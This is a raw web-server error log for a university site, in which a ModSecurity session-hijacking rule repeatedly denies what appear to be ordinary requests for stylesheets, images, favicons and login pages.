[Mon Aug 28 07:47:01.478784 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvuhcCo-f0AAJSxYiQAAAAH"]
[Mon Aug 28 07:47:01.508601 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvuhcCo-f0AAJSyp2kAAAAM"]
[Mon Aug 28 07:47:01.534265 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvuhcCo-f0AAJSxYiUAAAAH"]
[Mon Aug 28 07:47:06.191136 2023] [:error] [pid 38066] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvuisCo-f0AAJSyp2wAAAAM"]
[Mon Aug 28 07:47:06.240600 2023] [:error] [pid 37616] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvuisCo-f0AAJLwYUAAAAAB"]
[Mon Aug 28 07:47:06.240647 2023] [:error] [pid 38058] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvuisCo-f0AAJSq2lwAAAAC"]
[Mon Aug 28 07:47:06.244921 2023] [:error] [pid 38023] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvuisCo-f0AAJSHtckAAAAD"]
[Mon Aug 28 07:47:06.338497 2023] [:error] [pid 38066] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvuisCo-f0AAJSyp20AAAAM"]
[Mon Aug 28 07:47:06.731303 2023] [:error] [pid 38072] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvuisCo-f0AAJS4IHgAAAAa"]
[Mon Aug 28 07:47:11.303339 2023] [:error] [pid 38070] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvuj8Co-f0AAJS2FYIAAAAY"]
[Mon Aug 28 07:47:11.540001 2023] [:error] [pid 37616] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuj8Co-f0AAJLwYUIAAAAB"]
[Mon Aug 28 07:47:14.861381 2023] [:error] [pid 37916] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvuksCo-f0AAJQcJ30AAAAF"]
[Mon Aug 28 07:47:21.820853 2023] [:error] [pid 38070] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvumcCo-f0AAJS2FYUAAAAY"]
[Mon Aug 28 07:47:27.035578 2023] [:error] [pid 38024] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvun8Co-f0AAJSIdyMAAAAK"]
[Mon Aug 28 07:47:27.382578 2023] [:error] [pid 38070] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvun8Co-f0AAJS2FYYAAAAY"]
[Mon Aug 28 07:47:29.137391 2023] [:error] [pid 38062] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvuocCo-f0AAJSuHroAAAAS"]
[Mon Aug 28 07:47:33.139794 2023] [:error] [pid 38068] [client 114.122.116.210] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvupcCo-f0AAJS0EiwAAAAW"]
[Mon Aug 28 07:47:33.339138 2023] [:error] [pid 38064] [client 114.122.106.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvupcCo-f0AAJSw6ZoAAAAU"]
[Mon Aug 28 07:48:01.950820 2023] [:error] [pid 38066] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuwcCo-f0AAJSyp28AAAAM"]
[Mon Aug 28 07:48:02.215520 2023] [:error] [pid 38069] [client 114.122.106.62] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuwsCo-f0AAJS1nGYAAAAX"]
[Mon Aug 28 07:48:02.444373 2023] [:error] [pid 38067] [client 114.122.107.206] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuwsCo-f0AAJSz5pkAAAAV"]
[Mon Aug 28 07:48:02.447379 2023] [:error] [pid 38060] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuwsCo-f0AAJSsrPQAAAAQ"]
[Mon Aug 28 07:48:04.963902 2023] [:error] [pid 38058] [client 114.122.116.206] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuxMCo-f0AAJSq2mQAAAAC"]
[Mon Aug 28 07:48:05.064083 2023] [:error] [pid 38066] [client 114.122.106.62] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuxcCo-f0AAJSyp3AAAAAM"]
[Mon Aug 28 07:48:11.335153 2023] [:error] [pid 38066] [client 114.122.107.130] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuy8Co-f0AAJSyp3EAAAAM"]
[Mon Aug 28 07:48:11.684144 2023] [:error] [pid 38023] [client 114.122.107.150] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuy8Co-f0AAJSHtdcAAAAD"]
[Mon Aug 28 07:49:04.376257 2023] [:error] [pid 38060] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvvAMCo-f0AAJSsrP8AAAAQ"]
[Mon Aug 28 07:49:06.729017 2023] [:error] [pid 38064] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvvAsCo-f0AAJSw6a0AAAAU"]
[Mon Aug 28 07:49:12.152105 2023] [:error] [pid 38061] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvvCMCo-f0AAJSt5VIAAAAR"]
[Mon Aug 28 07:49:28.413338 2023] [:error] [pid 38065] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvvGMCo-f0AAJSxYjIAAAAH"]
[Mon Aug 28 07:49:28.474797 2023] [:error] [pid 38062] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvvGMCo-f0AAJSuHtIAAAAS"]
[Mon Aug 28 07:49:28.475056 2023] [:error] [pid 38058] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvvGMCo-f0AAJSq2nYAAAAC"]
[Mon Aug 28 07:49:28.475689 2023] [:error] [pid 38068] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvvGMCo-f0AAJS0EkAAAAAW"]
[Mon Aug 28 07:49:28.715314 2023] [:error] [pid 38062] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvvGMCo-f0AAJSuHtMAAAAS"]
[Mon Aug 28 07:49:38.175537 2023] [:error] [pid 38067] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvvIsCo-f0AAJSz5qAAAAAV"]
[Mon Aug 28 07:49:38.429407 2023] [:error] [pid 38066] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvvIsCo-f0AAJSyp4YAAAAM"]
[Mon Aug 28 07:49:58.352427 2023] [:error] [pid 38060] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvvNsCo-f0AAJSsrQ0AAAAQ"]
[Mon Aug 28 07:49:58.697175 2023] [:error] [pid 38065] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvvNsCo-f0AAJSxYjoAAAAH"]
[Mon Aug 28 07:50:03.445024 2023] [:error] [pid 38059] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvvO8Co-f0AAJSr2fwAAAAO"]
[Mon Aug 28 07:54:52.563544 2023] [:error] [pid 37539] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvwXMCo-f0AAJKjZ08AAAAG"]
[Mon Aug 28 07:54:52.567314 2023] [:error] [pid 38113] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvwXMCo-f0AAJTh5GIAAAAD"]
[Mon Aug 28 07:54:52.610461 2023] [:error] [pid 38065] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvwXMCo-f0AAJSxYmcAAAAH"]
[Mon Aug 28 07:54:52.651511 2023] [:error] [pid 38068] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvwXMCo-f0AAJS0EnYAAAAW"]
[Mon Aug 28 07:54:52.748961 2023] [:error] [pid 37539] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvwXMCo-f0AAJKjZ1AAAAAG"]
[Mon Aug 28 07:54:57.259044 2023] [:error] [pid 38061] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvwYcCo-f0AAJSt5VkAAAAR"]
[Mon Aug 28 07:54:57.384142 2023] [:error] [pid 38075] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvwYcCo-f0AAJS7RwoAAAAB"]
[Mon Aug 28 07:55:01.416543 2023] [:error] [pid 37918] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvwZcCo-f0AAJQeRkkAAAAP"]
[Mon Aug 28 07:55:01.588125 2023] [:error] [pid 38114] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvwZcCo-f0AAJTinQsAAAAE"]
[Mon Aug 28 07:55:03.597260 2023] [:error] [pid 38113] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvwZ8Co-f0AAJTh5GQAAAAD"]
[Mon Aug 28 07:55:06.424389 2023] [:error] [pid 38059] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwasCo-f0AAJSr2iQAAAAO"]
[Mon Aug 28 07:55:08.717148 2023] [:error] [pid 38113] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwbMCo-f0AAJTh5GUAAAAD"]
[Mon Aug 28 07:55:09.768110 2023] [:error] [pid 37918] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwbcCo-f0AAJQeRkwAAAAP"]
[Mon Aug 28 07:55:10.660365 2023] [:error] [pid 38075] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvwbsCo-f0AAJS7RwwAAAAB"]
[Mon Aug 28 07:55:10.675661 2023] [:error] [pid 37539] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvwbsCo-f0AAJKjZ1QAAAAG"]
[Mon Aug 28 07:55:10.679144 2023] [:error] [pid 38068] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvwbsCo-f0AAJS0EnoAAAAW"]
[Mon Aug 28 07:55:10.719398 2023] [:error] [pid 38060] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvwbsCo-f0AAJSsrTwAAAAQ"]
[Mon Aug 28 07:55:10.753666 2023] [:error] [pid 37803] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvwbsCo-f0AAJOr9wcAAAAL"]
[Mon Aug 28 07:55:10.758817 2023] [:error] [pid 37918] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvwbsCo-f0AAJQeRk0AAAAP"]
[Mon Aug 28 07:55:13.266789 2023] [:error] [pid 37844] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvwccCo-f0AAJPUAl4AAAAA"]
[Mon Aug 28 07:55:14.883613 2023] [:error] [pid 37539] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvwcsCo-f0AAJKjZ1YAAAAG"]
[Mon Aug 28 07:55:16.283326 2023] [:error] [pid 38060] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwdMCo-f0AAJSsrT4AAAAQ"]
[Mon Aug 28 07:58:18.460011 2023] [:error] [pid 38151] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvxKsCo-f0AAJUH75EAAAAF"]
[Mon Aug 28 07:58:18.582714 2023] [:error] [pid 38113] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxKsCo-f0AAJTh5I4AAAAD"]
[Mon Aug 28 07:58:26.953693 2023] [:error] [pid 38113] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxMsCo-f0AAJTh5JAAAAAD"]
